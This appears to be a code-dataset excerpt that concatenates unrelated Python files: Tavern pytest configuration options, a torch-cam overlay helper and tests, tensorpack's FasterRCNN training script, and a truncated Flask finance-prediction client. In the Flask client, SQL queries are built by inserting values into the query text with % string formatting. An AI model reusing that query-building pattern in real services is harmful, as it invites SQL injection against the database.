"--tavern-mqtt-backend",
help="Which mqtt backend to use",
default="paho-mqtt" if with_defaults else None,
)
parser_addoption(
"--tavern-strict",
help="Default response matching strictness",
default=None,
nargs="+",
choices=["json", "headers", "redirect_query_params"],
)
parser_addoption(
"--tavern-use-default-traceback",
help="Use normal python-style traceback",
default=False,
action="store_true",
)
parser_addoption(
"--tavern-always-follow-redirects",
help="Always follow HTTP redirects",
default=False,
action="store_true",
)
parser_addoption(
"--tavern-file-path-regex",
help="Regex to search for Tavern YAML test files",
default=r".+\.tavern\.ya?ml$",
action="store",
nargs=1,
)
parser_addoption(
"--tavern-merge-ext-function-values",
help="Merge values from external functions in http requests",
default=False,
action="store_true",
)
def add_ini_options(parser):
"""Add an option to pass in a global config file for tavern
See also testutils.pytesthook.util.add_parser_options
"""
parser.addini(
"tavern-global-cfg",
help="One or more global configuration files to include in every test",
type="linelist",
default=[],
)
parser.addini(
"tavern-http-backend", help="Which http backend to use", default="requests"
)
parser.addini(
"tavern-mqtt-backend", help="Which mqtt backend to use", default="paho-mqtt"
)
parser.addini(
"tavern-strict",
help="Default response matching strictness",
type="args",
default=None,
)
parser.addini(
"tavern-use-default-traceback",
help="Use normal python-style traceback",
type="bool",
default=False,
)
parser.addini(
"tavern-always-follow-redirects",
help="Always follow HTTP redirects",
type="bool",
default=False,
)
parser.addini(
"tavern-file-path-regex",
help="Regex to search for Tavern YAML test files",
default=r".+\.tavern\.ya?ml$",
type="args",
)
parser.addini(
"tavern-merge-ext-function-values",
help="Merge values from external functions in http requests",
default=False,
type="bool",
)
@lru_cache()
def load_global_cfg(pytest_config):
"""Load globally included config files from cmdline/cfg file arguments
Args:
pytest_config (pytest.Config): Pytest config object
Returns:
dict: variables/stages/etc from global config files
Raises:
exceptions.UnexpectedKeysError: Invalid settings in one or more config
files detected
"""
# Load ini first
ini_global_cfg_paths = pytest_config.getini("tavern-global-cfg") or []
# THEN load command line, to allow overwriting of values
cmdline_global_cfg_paths = pytest_config.getoption("tavern_global_cfg") or []
all_paths = ini_global_cfg_paths + cmdline_global_cfg_paths
global_cfg = load_global_config(all_paths)
try:
loaded_variables = global_cfg["variables"]
except KeyError:
logger.debug("Nothing to format in global config files")
else:
tavern_box = Box({"tavern": {"env_vars": dict(os.environ)}})
global_cfg["variables"] = format_keys(loaded_variables, tavern_box)
# Can be overridden in tests
global_cfg["strict"] = _load_global_strictness(pytest_config)
global_cfg["follow_redirects"] = _load_global_follow_redirects(pytest_config)
global_cfg["backends"] = _load_global_backends(pytest_config)
global_cfg["merge_ext_values"] = _load_global_merge_ext(pytest_config)
logger.debug("Global config: %s", global_cfg)
return global_cfg
def _load_global_backends(pytest_config):
"""Load which backend should be used"""
backend_settings = {}
backends = ["http", "mqtt"]
for b in backends:
backend_settings[b] = get_option_generic(
pytest_config, "tavern-{}-backend".format(b), None
)
return backend_settings
def _load_global_strictness(pytest_config):
"""Load the global 'strictness' setting"""
options = get_option_generic(pytest_config, "tavern-strict", [])
return StrictLevel.from_options(options)
def _load_global_follow_redirects(pytest_config):
"""Load the global 'follow redirects' setting"""
return get_option_generic(pytest_config, "tavern-always-follow-redirects", False)
def _load_global_merge_ext(pytest_config):
"""Load the global setting about whether external values should be merged or not"""
return get_option_generic(pytest_config, "tavern-merge-ext-function-values", True)
def get_option_generic(pytest_config, flag, default):
"""Get a configuration option or return the default
Priority order is cmdline, then ini, then default"""
cli_flag = flag.replace("-", "_")
ini_flag = flag
# Lowest priority
use = default
# Middle priority
if pytest_config.getini(ini_flag) is not None:
use = pytest_config.getini(ini_flag)
# Top priority
if pytest_config.getoption(cli_flag) is not None:
use = pytest_config.getoption(cli_flag)
return use
``` |
{
"source": "13263081188/torch-cam",
"score": 3
} |
#### File: torch-cam/latent_cam/utils.py
```python
import numpy as np
from matplotlib import cm
from PIL import Image
def overlay_mask(img: Image.Image, mask: Image.Image, colormap: str = 'jet', alpha: float = 0.7) -> Image.Image:
"""Overlay a colormapped mask on a background image
Args:
img: background image
mask: mask to be overlayed in grayscale
colormap: colormap to be applied on the mask
alpha: transparency of the background image
Returns:
overlayed image
"""
if not isinstance(img, Image.Image) or not isinstance(mask, Image.Image):
raise TypeError('img and mask arguments need to be PIL.Image')
if not isinstance(alpha, float) or alpha < 0 or alpha >= 1:
raise ValueError('alpha argument is expected to be of type float between 0 and 1')
cmap = cm.get_cmap(colormap)
# Resize mask and apply colormap
overlay = mask.resize(img.size, resample=Image.BICUBIC)
overlay = (255 * cmap(np.asarray(overlay) ** 2)[:, :, :3]).astype(np.uint8)
# Overlay the image with the mask
overlayed_img = Image.fromarray((alpha * np.asarray(img) + (1 - alpha) * overlay).astype(np.uint8))
return overlayed_img
``` |
{
"source": "13263081188/VISUAL_1",
"score": 2
} |
#### File: VISUAL_1/test/test_cams_core.py
```python
import pytest
import torch
from torchcam.cams import core
def test_cam_constructor(mock_img_model):
model = mock_img_model.eval()
# Check that wrong target_layer raises an error
with pytest.raises(ValueError):
_ = core._CAM(model, '3')
def test_cam_precheck(mock_img_model, mock_img_tensor):
model = mock_img_model.eval()
extractor = core._CAM(model, '0.3')
with torch.no_grad():
# Check missing forward raises Error
with pytest.raises(AssertionError):
extractor(0)
# Check that a batch of 2 cannot be accepted
_ = model(torch.cat((mock_img_tensor, mock_img_tensor)))
with pytest.raises(ValueError):
extractor(0)
# Correct forward
_ = model(mock_img_tensor)
# Check incorrect class index
with pytest.raises(ValueError):
extractor(-1)
# Check missing score
if extractor._score_used:
with pytest.raises(ValueError):
extractor(0)
@pytest.mark.parametrize(
"input_shape, spatial_dims",
[
[(8, 8), None],
[(8, 8, 8), None],
[(8, 8, 8), 2],
[(8, 8, 8, 8), None],
[(8, 8, 8, 8), 3],
],
)
def test_cam_normalize(input_shape, spatial_dims):
input_tensor = torch.rand(input_shape)
normalized_tensor = core._CAM._normalize(input_tensor, spatial_dims)
# Shape check
assert normalized_tensor.shape == input_shape
# Value check
assert not torch.any(torch.isnan(normalized_tensor))
assert torch.all(normalized_tensor <= 1) and torch.all(normalized_tensor >= 0)
def test_cam_clear_hooks(mock_img_model):
model = mock_img_model.eval()
extractor = core._CAM(model, '0.3')
assert len(extractor.hook_handles) == 1
# Check that there is only one hook on the model
assert extractor.hook_a is None
with torch.no_grad():
_ = model(torch.rand((1, 3, 32, 32)))
assert extractor.hook_a is not None
# Remove it
extractor.clear_hooks()
assert len(extractor.hook_handles) == 0
# Check that there is no hook anymore
extractor.hook_a = None
with torch.no_grad():
_ = model(torch.rand((1, 3, 32, 32)))
assert extractor.hook_a is None
def test_cam_repr(mock_img_model):
model = mock_img_model.eval()
extractor = core._CAM(model, '0.3')
assert repr(extractor) == "_CAM(target_layer='0.3')"
``` |
{
"source": "13266828291/tensorpack",
"score": 2
} |
#### File: examples/FasterRCNN/train.py
```python
import os
import argparse
import cv2
import shutil
import itertools
import tqdm
import numpy as np
import json
import six
import tensorflow as tf
try:
import horovod.tensorflow as hvd
except ImportError:
pass
assert six.PY3, "FasterRCNN requires Python 3!"
from tensorpack import *
from tensorpack.tfutils.summary import add_moving_summary
from tensorpack.tfutils import optimizer
from tensorpack.tfutils.common import get_tf_version_tuple
import tensorpack.utils.viz as tpviz
from coco import COCODetection
from basemodel import (
image_preprocess, resnet_c4_backbone, resnet_conv5,
resnet_fpn_backbone)
import model_frcnn
import model_mrcnn
from model_frcnn import (
sample_fast_rcnn_targets, fastrcnn_outputs,
fastrcnn_predictions, BoxProposals, FastRCNNHead)
from model_mrcnn import maskrcnn_upXconv_head, maskrcnn_loss
from model_rpn import rpn_head, rpn_losses, generate_rpn_proposals
from model_fpn import (
fpn_model, multilevel_roi_align,
multilevel_rpn_losses, generate_fpn_proposals)
from model_cascade import CascadeRCNNHead
from model_box import (
clip_boxes, crop_and_resize, roi_align, RPNAnchors)
from data import (
get_train_dataflow, get_eval_dataflow,
get_all_anchors, get_all_anchors_fpn)
from viz import (
draw_annotation, draw_proposal_recall,
draw_predictions, draw_final_outputs)
from eval import (
eval_coco, multithread_eval_coco,
detect_one_image, print_coco_metrics, DetectionResult)
from config import finalize_configs, config as cfg
class DetectionModel(ModelDesc):
def preprocess(self, image):
image = tf.expand_dims(image, 0)
image = image_preprocess(image, bgr=True)
return tf.transpose(image, [0, 3, 1, 2])
@property
def training(self):
return get_current_tower_context().is_training
def optimizer(self):
lr = tf.get_variable('learning_rate', initializer=0.003, trainable=False)
tf.summary.scalar('learning_rate-summary', lr)
# The learning rate is set for 8 GPUs, and we use trainers with average=False.
lr = lr / 8.
opt = tf.train.MomentumOptimizer(lr, 0.9)
if cfg.TRAIN.NUM_GPUS < 8:
opt = optimizer.AccumGradOptimizer(opt, 8 // cfg.TRAIN.NUM_GPUS)
return opt
def get_inference_tensor_names(self):
"""
Returns two lists of tensor names to be used to create an inference callable.
Returns:
[str]: input names
[str]: output names
"""
out = ['output/boxes', 'output/scores', 'output/labels']
if cfg.MODE_MASK:
out.append('output/masks')
return ['image'], out
def build_graph(self, *inputs):
inputs = dict(zip(self.input_names, inputs))
image = self.preprocess(inputs['image']) # 1CHW
features = self.backbone(image)
anchor_inputs = {k: v for k, v in inputs.items() if k.startswith('anchor_')}
proposals, rpn_losses = self.rpn(image, features, anchor_inputs) # inputs?
targets = [inputs[k] for k in ['gt_boxes', 'gt_labels', 'gt_masks'] if k in inputs]
head_losses = self.roi_heads(image, features, proposals, targets)
if self.training:
wd_cost = regularize_cost(
'.*/W', l2_regularizer(cfg.TRAIN.WEIGHT_DECAY), name='wd_cost')
total_cost = tf.add_n(
rpn_losses + head_losses + [wd_cost], 'total_cost')
add_moving_summary(total_cost, wd_cost)
return total_cost
class ResNetC4Model(DetectionModel):
def inputs(self):
ret = [
tf.placeholder(tf.float32, (None, None, 3), 'image'),
tf.placeholder(tf.int32, (None, None, cfg.RPN.NUM_ANCHOR), 'anchor_labels'),
tf.placeholder(tf.float32, (None, None, cfg.RPN.NUM_ANCHOR, 4), 'anchor_boxes'),
tf.placeholder(tf.float32, (None, 4), 'gt_boxes'),
tf.placeholder(tf.int64, (None,), 'gt_labels')] # all > 0
if cfg.MODE_MASK:
ret.append(
tf.placeholder(tf.uint8, (None, None, None), 'gt_masks')
) # NR_GT x height x width
return ret
def backbone(self, image):
return [resnet_c4_backbone(image, cfg.BACKBONE.RESNET_NUM_BLOCKS[:3])]
def rpn(self, image, features, inputs):
featuremap = features[0]
rpn_label_logits, rpn_box_logits = rpn_head('rpn', featuremap, cfg.RPN.HEAD_DIM, cfg.RPN.NUM_ANCHOR)
anchors = RPNAnchors(get_all_anchors(), inputs['anchor_labels'], inputs['anchor_boxes'])
anchors = anchors.narrow_to(featuremap)
image_shape2d = tf.shape(image)[2:] # h,w
pred_boxes_decoded = anchors.decode_logits(rpn_box_logits) # fHxfWxNAx4, floatbox
proposal_boxes, proposal_scores = generate_rpn_proposals(
tf.reshape(pred_boxes_decoded, [-1, 4]),
tf.reshape(rpn_label_logits, [-1]),
image_shape2d,
cfg.RPN.TRAIN_PRE_NMS_TOPK if self.training else cfg.RPN.TEST_PRE_NMS_TOPK,
cfg.RPN.TRAIN_POST_NMS_TOPK if self.training else cfg.RPN.TEST_POST_NMS_TOPK)
if self.training:
losses = rpn_losses(
anchors.gt_labels, anchors.encoded_gt_boxes(), rpn_label_logits, rpn_box_logits)
else:
losses = []
return BoxProposals(proposal_boxes), losses
def roi_heads(self, image, features, proposals, targets):
image_shape2d = tf.shape(image)[2:] # h,w
featuremap = features[0]
gt_boxes, gt_labels, *_ = targets
if self.training:
# sample proposal boxes in training
proposals = sample_fast_rcnn_targets(proposals.boxes, gt_boxes, gt_labels)
# The boxes to be used to crop RoIs.
# Use all proposal boxes in inference
boxes_on_featuremap = proposals.boxes * (1.0 / cfg.RPN.ANCHOR_STRIDE)
roi_resized = roi_align(featuremap, boxes_on_featuremap, 14)
feature_fastrcnn = resnet_conv5(roi_resized, cfg.BACKBONE.RESNET_NUM_BLOCKS[-1]) # nxcx7x7
# Keep C5 feature to be shared with mask branch
feature_gap = GlobalAvgPooling('gap', feature_fastrcnn, data_format='channels_first')
fastrcnn_label_logits, fastrcnn_box_logits = fastrcnn_outputs('fastrcnn', feature_gap, cfg.DATA.NUM_CLASS)
fastrcnn_head = FastRCNNHead(proposals, fastrcnn_box_logits, fastrcnn_label_logits, gt_boxes,
tf.constant(cfg.FRCNN.BBOX_REG_WEIGHTS, dtype=tf.float32))
if self.training:
all_losses = fastrcnn_head.losses()
if cfg.MODE_MASK:
gt_masks = targets[2]
# maskrcnn loss
# In training, mask branch shares the same C5 feature.
fg_feature = tf.gather(feature_fastrcnn, proposals.fg_inds())
mask_logits = maskrcnn_upXconv_head(
'maskrcnn', fg_feature, cfg.DATA.NUM_CATEGORY, num_convs=0) # #fg x #cat x 14x14
target_masks_for_fg = crop_and_resize(
tf.expand_dims(gt_masks, 1),
proposals.fg_boxes(),
proposals.fg_inds_wrt_gt, 14,
pad_border=False) # nfg x 1x14x14
target_masks_for_fg = tf.squeeze(target_masks_for_fg, 1, 'sampled_fg_mask_targets')
all_losses.append(maskrcnn_loss(mask_logits, proposals.fg_labels(), target_masks_for_fg))
return all_losses
else:
decoded_boxes = fastrcnn_head.decoded_output_boxes()
decoded_boxes = clip_boxes(decoded_boxes, image_shape2d, name='fastrcnn_all_boxes')
label_scores = fastrcnn_head.output_scores(name='fastrcnn_all_scores')
final_boxes, final_scores, final_labels = fastrcnn_predictions(
decoded_boxes, label_scores, name_scope='output')
if cfg.MODE_MASK:
roi_resized = roi_align(featuremap, final_boxes * (1.0 / cfg.RPN.ANCHOR_STRIDE), 14)
feature_maskrcnn = resnet_conv5(roi_resized, cfg.BACKBONE.RESNET_NUM_BLOCKS[-1])
mask_logits = maskrcnn_upXconv_head(
'maskrcnn', feature_maskrcnn, cfg.DATA.NUM_CATEGORY, 0) # #result x #cat x 14x14
indices = tf.stack([tf.range(tf.size(final_labels)), tf.cast(final_labels, tf.int32) - 1], axis=1)
final_mask_logits = tf.gather_nd(mask_logits, indices) # #resultx14x14
tf.sigmoid(final_mask_logits, name='output/masks')
return []
class ResNetFPNModel(DetectionModel):
def inputs(self):
ret = [
tf.placeholder(tf.float32, (None, None, 3), 'image')]
num_anchors = len(cfg.RPN.ANCHOR_RATIOS)
for k in range(len(cfg.FPN.ANCHOR_STRIDES)):
ret.extend([
tf.placeholder(tf.int32, (None, None, num_anchors),
'anchor_labels_lvl{}'.format(k + 2)),
tf.placeholder(tf.float32, (None, None, num_anchors, 4),
'anchor_boxes_lvl{}'.format(k + 2))])
ret.extend([
tf.placeholder(tf.float32, (None, 4), 'gt_boxes'),
tf.placeholder(tf.int64, (None,), 'gt_labels')]) # all > 0
if cfg.MODE_MASK:
ret.append(
tf.placeholder(tf.uint8, (None, None, None), 'gt_masks')
) # NR_GT x height x width
return ret
def slice_feature_and_anchors(self, p23456, anchors):
for i, stride in enumerate(cfg.FPN.ANCHOR_STRIDES):
with tf.name_scope('FPN_slice_lvl{}'.format(i)):
anchors[i] = anchors[i].narrow_to(p23456[i])
def backbone(self, image):
c2345 = resnet_fpn_backbone(image, cfg.BACKBONE.RESNET_NUM_BLOCKS)
p23456 = fpn_model('fpn', c2345)
return p23456
def rpn(self, image, features, inputs):
assert len(cfg.RPN.ANCHOR_SIZES) == len(cfg.FPN.ANCHOR_STRIDES)
image_shape2d = tf.shape(image)[2:] # h,w
all_anchors_fpn = get_all_anchors_fpn()
multilevel_anchors = [RPNAnchors(
all_anchors_fpn[i],
inputs['anchor_labels_lvl{}'.format(i + 2)],
inputs['anchor_boxes_lvl{}'.format(i + 2)]) for i in range(len(all_anchors_fpn))]
self.slice_feature_and_anchors(features, multilevel_anchors)
# Multi-Level RPN Proposals
rpn_outputs = [rpn_head('rpn', pi, cfg.FPN.NUM_CHANNEL, len(cfg.RPN.ANCHOR_RATIOS))
for pi in features]
multilevel_label_logits = [k[0] for k in rpn_outputs]
multilevel_box_logits = [k[1] for k in rpn_outputs]
multilevel_pred_boxes = [anchor.decode_logits(logits)
for anchor, logits in zip(multilevel_anchors, multilevel_box_logits)]
proposal_boxes, proposal_scores = generate_fpn_proposals(
multilevel_pred_boxes, multilevel_label_logits, image_shape2d)
if self.training:
losses = multilevel_rpn_losses(
multilevel_anchors, multilevel_label_logits, multilevel_box_logits)
else:
losses = []
return BoxProposals(proposal_boxes), losses
def roi_heads(self, image, features, proposals, targets):
image_shape2d = tf.shape(image)[2:] # h,w
assert len(features) == 5, "Features have to be P23456!"
gt_boxes, gt_labels, *_ = targets
if self.training:
proposals = sample_fast_rcnn_targets(proposals.boxes, gt_boxes, gt_labels)
fastrcnn_head_func = getattr(model_frcnn, cfg.FPN.FRCNN_HEAD_FUNC)
if not cfg.FPN.CASCADE:
roi_feature_fastrcnn = multilevel_roi_align(features[:4], proposals.boxes, 7)
head_feature = fastrcnn_head_func('fastrcnn', roi_feature_fastrcnn)
fastrcnn_label_logits, fastrcnn_box_logits = fastrcnn_outputs(
'fastrcnn/outputs', head_feature, cfg.DATA.NUM_CLASS)
fastrcnn_head = FastRCNNHead(proposals, fastrcnn_box_logits, fastrcnn_label_logits,
gt_boxes, tf.constant(cfg.FRCNN.BBOX_REG_WEIGHTS, dtype=tf.float32))
else:
def roi_func(boxes):
return multilevel_roi_align(features[:4], boxes, 7)
fastrcnn_head = CascadeRCNNHead(
proposals, roi_func, fastrcnn_head_func,
(gt_boxes, gt_labels), image_shape2d, cfg.DATA.NUM_CLASS)
if self.training:
all_losses = fastrcnn_head.losses()
if cfg.MODE_MASK:
gt_masks = targets[2]
# maskrcnn loss
roi_feature_maskrcnn = multilevel_roi_align(
features[:4], proposals.fg_boxes(), 14,
name_scope='multilevel_roi_align_mask')
maskrcnn_head_func = getattr(model_mrcnn, cfg.FPN.MRCNN_HEAD_FUNC)
mask_logits = maskrcnn_head_func(
'maskrcnn', roi_feature_maskrcnn, cfg.DATA.NUM_CATEGORY) # #fg x #cat x 28 x 28
target_masks_for_fg = crop_and_resize(
tf.expand_dims(gt_masks, 1),
proposals.fg_boxes(),
proposals.fg_inds_wrt_gt, 28,
pad_border=False) # fg x 1x28x28
target_masks_for_fg = tf.squeeze(target_masks_for_fg, 1, 'sampled_fg_mask_targets')
all_losses.append(maskrcnn_loss(mask_logits, proposals.fg_labels(), target_masks_for_fg))
return all_losses
else:
decoded_boxes = fastrcnn_head.decoded_output_boxes()
decoded_boxes = clip_boxes(decoded_boxes, image_shape2d, name='fastrcnn_all_boxes')
label_scores = fastrcnn_head.output_scores(name='fastrcnn_all_scores')
final_boxes, final_scores, final_labels = fastrcnn_predictions(
decoded_boxes, label_scores, name_scope='output')
if cfg.MODE_MASK:
# Cascade inference needs roi transform with refined boxes.
roi_feature_maskrcnn = multilevel_roi_align(features[:4], final_boxes, 14)
maskrcnn_head_func = getattr(model_mrcnn, cfg.FPN.MRCNN_HEAD_FUNC)
mask_logits = maskrcnn_head_func(
'maskrcnn', roi_feature_maskrcnn, cfg.DATA.NUM_CATEGORY) # #fg x #cat x 28 x 28
indices = tf.stack([tf.range(tf.size(final_labels)), tf.cast(final_labels, tf.int32) - 1], axis=1)
final_mask_logits = tf.gather_nd(mask_logits, indices) # #resultx28x28
tf.sigmoid(final_mask_logits, name='output/masks')
return []
def visualize(model, model_path, nr_visualize=100, output_dir='output'):
"""
Visualize some intermediate results (proposals, raw predictions) inside the pipeline.
"""
df = get_train_dataflow() # we don't visualize mask stuff
df.reset_state()
pred = OfflinePredictor(PredictConfig(
model=model,
session_init=get_model_loader(model_path),
input_names=['image', 'gt_boxes', 'gt_labels'],
output_names=[
'generate_{}_proposals/boxes'.format('fpn' if cfg.MODE_FPN else 'rpn'),
'generate_{}_proposals/scores'.format('fpn' if cfg.MODE_FPN else 'rpn'),
'fastrcnn_all_scores',
'output/boxes',
'output/scores',
'output/labels',
]))
if os.path.isdir(output_dir):
shutil.rmtree(output_dir)
utils.fs.mkdir_p(output_dir)
with tqdm.tqdm(total=nr_visualize) as pbar:
for idx, dp in itertools.islice(enumerate(df), nr_visualize):
img, gt_boxes, gt_labels = dp['image'], dp['gt_boxes'], dp['gt_labels']
rpn_boxes, rpn_scores, all_scores, \
final_boxes, final_scores, final_labels = pred(img, gt_boxes, gt_labels)
# draw groundtruth boxes
gt_viz = draw_annotation(img, gt_boxes, gt_labels)
# draw best proposals for each groundtruth, to show recall
proposal_viz, good_proposals_ind = draw_proposal_recall(img, rpn_boxes, rpn_scores, gt_boxes)
# draw the scores for the above proposals
score_viz = draw_predictions(img, rpn_boxes[good_proposals_ind], all_scores[good_proposals_ind])
results = [DetectionResult(*args) for args in
zip(final_boxes, final_scores, final_labels,
[None] * len(final_labels))]
final_viz = draw_final_outputs(img, results)
viz = tpviz.stack_patches([
gt_viz, proposal_viz,
score_viz, final_viz], 2, 2)
if os.environ.get('DISPLAY', None):
tpviz.interactive_imshow(viz)
cv2.imwrite("{}/{:03d}.png".format(output_dir, idx), viz)
pbar.update()
def offline_evaluate(pred_config, output_file):
num_gpu = cfg.TRAIN.NUM_GPUS
graph_funcs = MultiTowerOfflinePredictor(
pred_config, list(range(num_gpu))).get_predictors()
predictors = []
dataflows = []
for k in range(num_gpu):
predictors.append(lambda img,
pred=graph_funcs[k]: detect_one_image(img, pred))
dataflows.append(get_eval_dataflow(shard=k, num_shards=num_gpu))
if num_gpu > 1:
all_results = multithread_eval_coco(dataflows, predictors)
else:
all_results = eval_coco(dataflows[0], predictors[0])
with open(output_file, 'w') as f:
json.dump(all_results, f)
print_coco_metrics(output_file)
def predict(pred_func, input_file):
img = cv2.imread(input_file, cv2.IMREAD_COLOR)
results = detect_one_image(img, pred_func)
final = draw_final_outputs(img, results)
viz = np.concatenate((img, final), axis=1)
cv2.imwrite("output.png", viz)
logger.info("Inference output written to output.png")
tpviz.interactive_imshow(viz)
class EvalCallback(Callback):
"""
A callback that runs COCO evaluation once a while.
It supports multi-gpu evaluation.
"""
_chief_only = False
def __init__(self, in_names, out_names):
self._in_names, self._out_names = in_names, out_names
def _setup_graph(self):
num_gpu = cfg.TRAIN.NUM_GPUS
if cfg.TRAINER == 'replicated':
# TF bug in version 1.11, 1.12: https://github.com/tensorflow/tensorflow/issues/22750
buggy_tf = get_tf_version_tuple() in [(1, 11), (1, 12)]
# Use two predictor threads per GPU to get better throughput
self.num_predictor = num_gpu if buggy_tf else num_gpu * 2
self.predictors = [self._build_coco_predictor(k % num_gpu) for k in range(self.num_predictor)]
self.dataflows = [get_eval_dataflow(shard=k, num_shards=self.num_predictor)
for k in range(self.num_predictor)]
else:
# Only eval on the first machine.
# Alternatively, can eval on all ranks and use allgather, but allgather sometimes hangs
self._horovod_run_eval = hvd.rank() == hvd.local_rank()
if self._horovod_run_eval:
self.predictor = self._build_coco_predictor(0)
self.dataflow = get_eval_dataflow(shard=hvd.local_rank(), num_shards=hvd.local_size())
self.barrier = hvd.allreduce(tf.random_normal(shape=[1]))
def _build_coco_predictor(self, idx):
graph_func = self.trainer.get_predictor(self._in_names, self._out_names, device=idx)
return lambda img: detect_one_image(img, graph_func)
def _before_train(self):
eval_period = cfg.TRAIN.EVAL_PERIOD
self.epochs_to_eval = set()
for k in itertools.count(1):
if k * eval_period > self.trainer.max_epoch:
break
self.epochs_to_eval.add(k * eval_period)
self.epochs_to_eval.add(self.trainer.max_epoch)
logger.info("[EvalCallback] Will evaluate every {} epochs".format(eval_period))
def _eval(self):
logdir = args.logdir
if cfg.TRAINER == 'replicated':
all_results = multithread_eval_coco(self.dataflows, self.predictors)
else:
filenames = [os.path.join(
logdir, 'outputs{}-part{}.json'.format(self.global_step, rank)
) for rank in range(hvd.local_size())]
if self._horovod_run_eval:
local_results = eval_coco(self.dataflow, self.predictor)
fname = filenames[hvd.local_rank()]
with open(fname, 'w') as f:
json.dump(local_results, f)
self.barrier.eval()
if hvd.rank() > 0:
return
all_results = []
for fname in filenames:
with open(fname, 'r') as f:
obj = json.load(f)
all_results.extend(obj)
os.unlink(fname)
output_file = os.path.join(
logdir, 'outputs{}.json'.format(self.global_step))
with open(output_file, 'w') as f:
json.dump(all_results, f)
try:
scores = print_coco_metrics(output_file)
for k, v in scores.items():
self.trainer.monitors.put_scalar(k, v)
except Exception:
logger.exception("Exception in COCO evaluation.")
def _trigger_epoch(self):
if self.epoch_num in self.epochs_to_eval:
logger.info("Running evaluation ...")
self._eval()
if __name__ == '__main__':
parser = argparse.ArgumentParser()
parser.add_argument('--load', help='load a model for evaluation or training. Can overwrite BACKBONE.WEIGHTS')
parser.add_argument('--logdir', help='log directory', default='train_log/maskrcnn')
parser.add_argument('--visualize', action='store_true', help='visualize intermediate results')
parser.add_argument('--evaluate', help="Run evaluation on COCO. "
"This argument is the path to the output json evaluation file")
parser.add_argument('--predict', help="Run prediction on a given image. "
"This argument is the path to the input image file")
parser.add_argument('--config', help="A list of KEY=VALUE to overwrite those defined in config.py",
nargs='+')
if get_tf_version_tuple() < (1, 6):
# https://github.com/tensorflow/tensorflow/issues/14657
logger.warn("TF<1.6 has a bug which may lead to crash in FasterRCNN if you're unlucky.")
args = parser.parse_args()
if args.config:
cfg.update_args(args.config)
MODEL = ResNetFPNModel() if cfg.MODE_FPN else ResNetC4Model()
if args.visualize or args.evaluate or args.predict:
assert tf.test.is_gpu_available()
assert args.load
finalize_configs(is_training=False)
if args.predict or args.visualize:
cfg.TEST.RESULT_SCORE_THRESH = cfg.TEST.RESULT_SCORE_THRESH_VIS
if args.visualize:
visualize(MODEL, args.load)
else:
predcfg = PredictConfig(
model=MODEL,
session_init=get_model_loader(args.load),
input_names=MODEL.get_inference_tensor_names()[0],
output_names=MODEL.get_inference_tensor_names()[1])
if args.predict:
COCODetection(cfg.DATA.BASEDIR, 'val2014') # Only to load the class names into caches
predict(OfflinePredictor(predcfg), args.predict)
elif args.evaluate:
assert args.evaluate.endswith('.json'), args.evaluate
offline_evaluate(predcfg, args.evaluate)
else:
is_horovod = cfg.TRAINER == 'horovod'
if is_horovod:
hvd.init()
logger.info("Horovod Rank={}, Size={}".format(hvd.rank(), hvd.size()))
if not is_horovod or hvd.rank() == 0:
logger.set_logger_dir(args.logdir, 'd')
finalize_configs(is_training=True)
stepnum = cfg.TRAIN.STEPS_PER_EPOCH
# warmup is step based, lr is epoch based
init_lr = cfg.TRAIN.BASE_LR * 0.33 * min(8. / cfg.TRAIN.NUM_GPUS, 1.)
warmup_schedule = [(0, init_lr), (cfg.TRAIN.WARMUP, cfg.TRAIN.BASE_LR)]
warmup_end_epoch = cfg.TRAIN.WARMUP * 1. / stepnum
lr_schedule = [(int(warmup_end_epoch + 0.5), cfg.TRAIN.BASE_LR)]
factor = 8. / cfg.TRAIN.NUM_GPUS
for idx, steps in enumerate(cfg.TRAIN.LR_SCHEDULE[:-1]):
mult = 0.1 ** (idx + 1)
lr_schedule.append(
(steps * factor // stepnum, cfg.TRAIN.BASE_LR * mult))
logger.info("Warm Up Schedule (steps, value): " + str(warmup_schedule))
logger.info("LR Schedule (epochs, value): " + str(lr_schedule))
train_dataflow = get_train_dataflow()
# This is what's commonly referred to as "epochs"
total_passes = cfg.TRAIN.LR_SCHEDULE[-1] * 8 / train_dataflow.size()
logger.info("Total passes of the training set is: {:.5g}".format(total_passes))
callbacks = [
PeriodicCallback(
ModelSaver(max_to_keep=10, keep_checkpoint_every_n_hours=1),
every_k_epochs=20),
# linear warmup
ScheduledHyperParamSetter(
'learning_rate', warmup_schedule, interp='linear', step_based=True),
ScheduledHyperParamSetter('learning_rate', lr_schedule),
EvalCallback(*MODEL.get_inference_tensor_names()),
PeakMemoryTracker(),
EstimatedTimeLeft(median=True),
SessionRunTimeout(60000).set_chief_only(True), # 1 minute timeout
]
if not is_horovod:
callbacks.append(GPUUtilizationTracker())
if is_horovod and hvd.rank() > 0:
session_init = None
else:
if args.load:
session_init = get_model_loader(args.load)
else:
session_init = get_model_loader(cfg.BACKBONE.WEIGHTS) if cfg.BACKBONE.WEIGHTS else None
traincfg = TrainConfig(
model=MODEL,
data=QueueInput(train_dataflow),
callbacks=callbacks,
steps_per_epoch=stepnum,
max_epoch=cfg.TRAIN.LR_SCHEDULE[-1] * factor // stepnum,
session_init=session_init,
starting_epoch=cfg.TRAIN.STARTING_EPOCH
)
if is_horovod:
trainer = HorovodTrainer(average=False)
else:
# nccl mode appears faster than cpu mode
trainer = SyncMultiGPUTrainerReplicated(cfg.TRAIN.NUM_GPUS, average=False, mode='nccl')
launch_train_with_config(traincfg, trainer)
``` |
{
"source": "13297915424/jinrong_predict",
"score": 3
} |
#### File: 13297915424/jinrong_predict/client.py
```python
from flask import Flask, render_template, jsonify,request,redirect,url_for
from db_client import DB_Connector
import os
import pandas as pd
import datetime
abs_path = os.getcwd()
app = Flask(__name__)
URL, PORT = '0.0.0.0',6007
def main(cls,name,msg,warn):
db = DB_Connector()
db.curse.execute("select class1 from mds_jinrong_day group by class1")
dalei = [i[0] for i in db.curse.fetchall()]
dalei.remove(cls)
dalei = [cls]+dalei
db.curse.execute("select name from %s where class1='%s' group by name" % (db.table,cls ))
names = sorted([str(i[0]) for i in db.curse.fetchall()])
names.remove(name)
names = [name]+names
db.curse.execute("select class2,date,data from %s where class1='%s' and name='%s'" % (db.table, cls, name))
dt = pd.DataFrame(db.curse.fetchall(), columns=['class2', 'date', 'data'],dtype=str)
lines = []
legend = []
xAxis = set()
predict_data = []
if cls=='银行':
tb_header = "一万元投资预计年收益(元)"
colnames = ['#', '预计收益']
else:
tb_header = "七日预测数据"
colnames = ['#', '第1日','第2日','第3日','第4日','第5日','第6日','第7日']
for cls2 in dt.groupby('class2'):
time_serise = cls2[1]
time_serise.loc[:, 'date'] = pd.to_datetime(time_serise['date'])
